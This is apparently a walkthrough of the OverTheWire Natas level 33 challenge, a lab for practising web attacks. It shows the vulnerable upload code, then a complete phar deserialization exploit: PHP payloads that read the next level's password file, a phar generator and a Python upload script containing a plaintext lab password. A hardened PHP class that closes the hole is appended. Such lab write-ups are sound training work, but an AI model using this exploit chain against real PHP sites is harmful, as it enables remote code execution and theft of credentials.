OverTheWire walkthrough: Natas level 33


We open level 33, log in and look at the page.




It is a file-upload page.

There must be a lot of filtering going on.




View the source:


// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
class Executor{
    private $filename=""; 		// three private members
    private $signature='adeafbadbabec0dedabada55ba55d00d';
    private $init=False;

    function __construct(){		// called when the object is created
        $this->filename=$_POST["filename"];
        if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {	// limit the file size
            echo "File is too big<br>";
        }
        else {														// move the file into /natas33/upload/
            if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                echo "Firmware upgrad initialised.<br>";
            }
            else{
                echo "There was an error uploading the file, please try again!<br>";
            }
        }
    }

    function __destruct(){		// called when the object is destroyed
        // upgrade firmware at the end of this script

        // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
        if(getcwd() === "/") chdir("/natas33/uploads/");	// getcwd() returns the current working directory; chdir() changes it
        if(md5_file($this->filename) == $this->signature){	// md5_file() computes the MD5 hash of a file
            echo "Congratulations! Running firmware update: $this->filename <br>";
            passthru("php " . $this->filename); // runs an external command
        }
        else{
            echo "Failur! MD5sum mismatch!<br>";
        }
    }
}

session_start();
if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
    new Executor();
}


Looking up how others approached it.




The approach relies on a deserialization vulnerability.




Following that approach, test.php:


<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>




Open Burp Suite and intercept the request.




1. First we upload the PHP file that reads the password.




Upload test.php.




Click upload.




Change the filename.




Mainly so that it matches the phar file.




The response says the MD5 value does not match.

2. Next we upload the phar file.




Intercept the request.

Change the filename.




Change the filename to make it easier to execute.




Upload succeeded.




Now we execute it.




Upload it once more,

only changing the filename.




An error appears.




The name was wrong.


Let's start over, this time using a Python script.


natas33solution.py


import subprocess
import re
import requests
from requests.auth import HTTPBasicAuth

def get_pass():
    
    auth = HTTPBasicAuth('natas33', 'APwWDD3fRAf6226sgBOBaSptGwvXwQhG')
    phar_payload = {'uploadedfile': open('exploit.phar', 'rb')}    
    php_payload = {'uploadedfile': open('payload.php', 'rb')}
    final_payload = {'uploadedfile': open('exploit.phar', 'rb')}    
    #Filename assignments for each payload
    phar_data = {'filename':'taldgan.phar'}
    php_data = {'filename':'taldgan.php'}
    final_data = {'filename':'phar://taldgan.phar'}

    #Need to make 3 requests: 1 to upload the php payload, 1 to upload the phar, and 1 to read the phar with phar://taldgan.phar as the filename
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=phar_payload, data=phar_data)  
    requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=php_payload, data=php_data)  
    r = requests.post('http://natas33.natas.labs.overthewire.org/', auth=auth, files=final_payload, data=final_data)  
    passreg = '[a-zA-Z0-9]{32}'
    print(re.findall(passreg, r.text)[0])

if __name__ == "__main__":
    get_pass()


The accompanying files are:


gen_phar_payload.php


<?php
// graz XeR, the first to solve it! thanks for the feedback!
// ~morla
// Same class name and fields as the target's Executor, so the metadata
// below unserializes into an object of that class on the server.
class Executor{
    private $filename='taldgan.php';
    private $signature='6ae14bb82be23c2cbd46a47366cf08c0';
}
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString("payload.php", "payload");
$phar->setStub('<?php __HALT_COMPILER(); ?>');   // the stub must end with __HALT_COMPILER();

$object = new Executor();
$phar->setMetadata($object);                     // the serialized object is stored as archive metadata
$phar->stopBuffering();
?>


md5payload


<?php
	print md5_file($argv[1]) . "\n";
?>


payload.php


<?php passthru('cat /etc/natas_webpass/natas34'); ?>
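The chain above works because md5_file() on a phar:// path makes PHP open the archive and unserialize its metadata, so the Executor stored by gen_phar_payload.php is recreated with a filename whose MD5 matches its own signature, and its __destruct runs passthru(). As an added example (not part of this writeup or the challenge code), here is a hardened counterpart of the Executor class that closes each of those openings; it assumes PHP 8.0 or later, and SafeExecutor, isVerified() and the temp-file demonstration are names introduced here.

```php
<?php
// Hardened counterpart of the level's Executor (added example, not the challenge's
// code; assumes PHP >= 8.0). It removes what the writeup relies on: a stream-wrapper
// filename ("phar://x.phar"), the loose "==" MD5 comparison, and privileged work in
// __destruct, which also runs on any unserialized copy of the object.
final class SafeExecutor
{
    private string $path;

    public function __construct(
        string $requestedName,
        private string $uploadDir = '/natas33/upload/',            // path from the level's source
        private string $signature = 'adeafbadbabec0dedabada55ba55d00d'
    ) {
        // Allow-list a bare file name: no "/", no ":", no leading dot, so
        // "phar://x", "../x" and "a/b" are refused before any filesystem call.
        if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/', $requestedName)) {
            throw new InvalidArgumentException("rejected upload name: $requestedName");
        }
        $this->path = $this->uploadDir . $requestedName;
    }

    // Refuse reconstruction from serialized data; that is how the phar trick builds
    // an Executor with attacker-chosen fields. (PHP 8.0 also stopped unserializing
    // phar metadata implicitly on stream access, but do not rely on that alone.)
    public function __unserialize(array $data): void
    {
        throw new LogicException('SafeExecutor must not be unserialized');
    }

    // Explicit check instead of an implicit __destruct side effect. hash_equals() is
    // strict and constant-time; "==" would compare numeric-looking hex strings as numbers.
    public function isVerified(): bool
    {
        if (!is_file($this->path)) {
            return false;
        }
        return hash_equals($this->signature, md5_file($this->path));
    }
}

// Constructed demonstration: a matching upload verifies, a wrong hash does not,
// bad names never reach the filesystem, and the unserialize path is closed.
$dir = sys_get_temp_dir() . '/';
file_put_contents($dir . 'firmware.php', "<?php echo 'ok';\n");
var_dump((new SafeExecutor('firmware.php', $dir, md5_file($dir . 'firmware.php')))->isVerified());
var_dump((new SafeExecutor('firmware.php', $dir))->isVerified());
foreach (['phar://taldgan.phar', '../payload.php'] as $name) {
    try { new SafeExecutor($name, $dir); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
}
try { unserialize('O:12:"SafeExecutor":0:{}'); } catch (LogicException $e) { echo $e->getMessage(), "\n"; }
```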


We run it in VS Code

and wait for the result.





Since natas34 would not open, the password could not be verified.

I'll try again once the network is better.

